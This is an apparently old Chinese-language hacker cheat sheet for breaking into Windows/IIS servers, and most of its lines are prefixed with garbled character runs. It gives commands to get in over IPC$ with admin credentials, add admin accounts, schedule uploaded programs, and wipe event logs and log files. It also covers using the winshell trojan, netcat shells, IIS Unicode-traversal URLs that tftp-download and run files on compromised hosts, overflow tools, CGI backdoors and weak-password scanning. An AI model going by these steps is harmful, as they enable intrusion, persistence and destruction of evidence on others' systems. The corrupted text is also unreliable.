网管和黑客都必须知道的命令
(liei�ye�^ 常用的几条NET命令:
2|$lk8�/, �T7^ulG1' (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
A"0wvk)UcY J
&{q�p�pN (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
_IC��,9bbg /z..5r^,ZZ (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
.r7D�)xNa@ Q6eN+i�2 ; (查看远程主机时间) net time \\IP地址
�>�1�m)%zt xnT3^ �#-h (定时启动某个程序) at \\IP地址 02:18 readme.exe
" \`B�P�N -�J��{D�xz (查看共享) net view \\IP地址
{3.*7gnY\L �|OO�Xh[y� (查看netbios工作组列表) nbtstat -A IP地址
Td5b�DO� v'h3CaA9�j (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
7�Nd*,�DV_ T=^jCH &�� (这两条把自己增加到管理员组): net user 用户名 密码 /add
�FPvuzBJ�� (%6�(5,�
� net localgroup Administrators 用户名 /add
#"hJpyW 4V 7[4_��+Q:} (断开连接) net use \\IP地址\ipc$ /delete
^GE^Q�\&D& )�\0Ug7�]? 扫尾:
^WmGo]<B_� \5t`p67Ve_ del C:\winnt\system32\logfiles\*.*
���V+peO�� D&���4u63^ del C:\winnt\ssytem32\config\*.evt
D~5�yj&&T; ����s�Ke�, del C:\winnt\system32\dtclog\*.*
�?�� 7�/W> 3fm;��r5�� del C:\winnt\system32\*.log
�'`�9%'f�) 3%_
4��+zd del C:\winnt\system32\*.txt
U)u\1AV5�� <9�ePi�9D( del C:\winnt\*.txt
Sjw2 j�#Q� �N� �9c8c del C:\winnt\*.log
:a#���F�� �umZlIH[7 一、netsvc.exe
P4�hZB_�.= fL(':W&n-� 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
5��z��e`IY P{�"���WlJ netsvc /list \\IP地址
0[V&8\S~'T &7$,<��9. netsvc schedule \\IP地址 /query
���D�/g��d k�uWK/6l�4 netsvc \\IP地址 schedule /start
�)?F�$-~�7 N�QDLI 1o� 二、OpenTelnet.exe
�k�X@�bv"i K~�`�n}_�: 远程启动主机的Telnet服务,并绑定端口到7878,例如:
���#DQX<:u �/!�^L69um OpenTelnet \\IP地址 用户名 密码 1 7878
o9_(�D�J<{ _Wm(/ +G_| 然后就可以telnet到主机的7878端口,进入DOS方式下:
ls��[L��s� N8,�EI^W8Z telnet IP地址 7878
X!,�#'�&p& Sg/:��n,68 三、winshell.exe
!S~,>�,y�d O3_D~O
." 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
�_L�?v6MTj b�^u�P^](J p Path (查看winshell主程序的路径信息)
�>r;ABz�/� R#"U/�8b>z b reBoot (重新启动机器)
%�T`4!:v�y q�:TZ�=bs^ d shutDown (关闭机器)
fn1 ?�Qp|
H��;b��8I s Shell (执行后你就会看到可爱的“C:\>”)
tn"Y9
�k|� AT�KYjhc _ x eXit (退出本次登录会话,此命令并不终止winshell的运行)
^z��vA?'�s J��N{<�oxI CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
:hC
{5!|� v9Z lNA7m! 四、3389登陆器,GUI方式登录远程主机的
1 ;_{US5FR g�,�00'z_D 五、elsave.exe
jf���$J�aY bHh�C56[M� 事件日志清除工具
,"P5�D&,_� S�1D�9�AcK elsave -s \\IP地址 -l "application" -C
%�MfGVx}nG �1�b�V��2� elsave -s \\IP地址 -l "system" -C
w^ixMn~nLF k)N�2��+/� elsave -s \\IP地址 -l "security" -C
<bEN�8b��� �n%�83jep9 执行后成功清除应用程序日志,系统日志,安全日志
E�\{^0v�Nc V�pug"aR&_ 六、hbulot.exe
kV�*y_��5g u}��JQTro� 开启win2kserver和winxp的3389服务
mr:k��n�0� ��^/_\etV� hbulot [/r]
M�[�:�O��( F,�'�^se4& 使用/r表示安装完成后自动重起目标使设置生效。
ddUjs8Vv�J 2x)0?N�[$O 七、nc.exe(netcat.exe)
�,H.(\p_N PY^^�^01�P 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
8C*6F�jb#� J>H���LQP� 想要连接到某处: nc [-options] hostname port[s] [ports] ...
�C�k ~V�5� ^/`#9�]<�% 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
PphR4 �sIM E�g@R�[ ^T 参数:
�>u��BV��� ?;0�n��Jf� -e prog 程序重定向,一旦连接,就执行 [危险!!]
Bx�n�8>�<� pr0�@�sri@ -g gateway source-routing hop point[s], up to 8
c�[wQ��Jc� ATYQ6E[{MV -G num source-routing pointer: 4, 8, 12, ...
AI�v�L�#12 p?dGZ2` [I -h 帮助信息
8\qCj.��>S &[?u1qQ%�o -i secs 延时的间隔
��7h9�fQ&y �
��At`1�) -l 监听模式,用于入站连接
% j[O&[s}
hRuo,�FS#: -n 指定数字的IP地址,不能用hostname
!.;x�t L � "T�B��QNWZ -o file 记录16进制的传输
i�F#}t(CrH &�rl]$M�tt -p port 本地端口号
;k�y�L>mV{ }S�~ysQw�T -r 任意指定本地及远程端口
�p|bc�=`TD ,<u��iitOo -s addr 本地源地址
l5\�B2 +}7 U�/�1[~429 -u UDP模式
mV���:RmA� �(ybtXoQs� -v 详细输出——用两个-v可得到更详细的内容
�br�3�4Eh� O?C-n�w6kP -w secs timeout的时间
Sy+]S�eF&� Uy$�U8b-ov -z 将输入输出关掉——用于扫描时
!7�IT~pO�` 八、TFTPD32.EXE
}5o��~R~�H U:m�q7Rd�8 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
��\U)2�
Tg �@y�U!�sE: http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
��h}anTFKP G����vZac 然后可以直接令文件运行:
RvyBg:A�j5 t_d�w�}I�� http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
�?l\gh�1{C %#�Wg^l
�' 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
.T#�y N\S1 #��q~3c;ec 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
*�!�r\�GGb :�Fi%Cef| 一、一 Xscan命令行运行参数说明:
�\J,- <�wF xY\*L:�TwW 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
h9Tf@]W�
� Y2=B�rtc[@ 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
NgE�&KPj\� �F(K��H-�� xscan -file <主机列表文件名> <检测项目> [其他选项]
SCfkv|h�O� }�Ke}�rM< 其中<检测项目> 含义如下:
�S1H47<)UF zu�lf%aaL -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
a O"nD�_7 �YmO"��EWb -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
7U{b+=�,wK i">z�8?qF� -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
h�VT=j ?�~ DSDl[;3O{s -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
D<_,�>{$gW 5,0�wj0�l� -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
�E+^} B/"
T}w*K[�z
$ [其他选项] 含义如下:
�Zv�1Bju*y 7�'�{�Y��z -v: 显示详细扫描进度
@ V7ooo!�� Z5��*(W;;� -p: 跳过Ping不通的主机
}GoO�E=rhY P[�#WHbn -o: 跳过没有检测到开放端口的主机
GqIvvnw@�f _�pH6uu��B -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
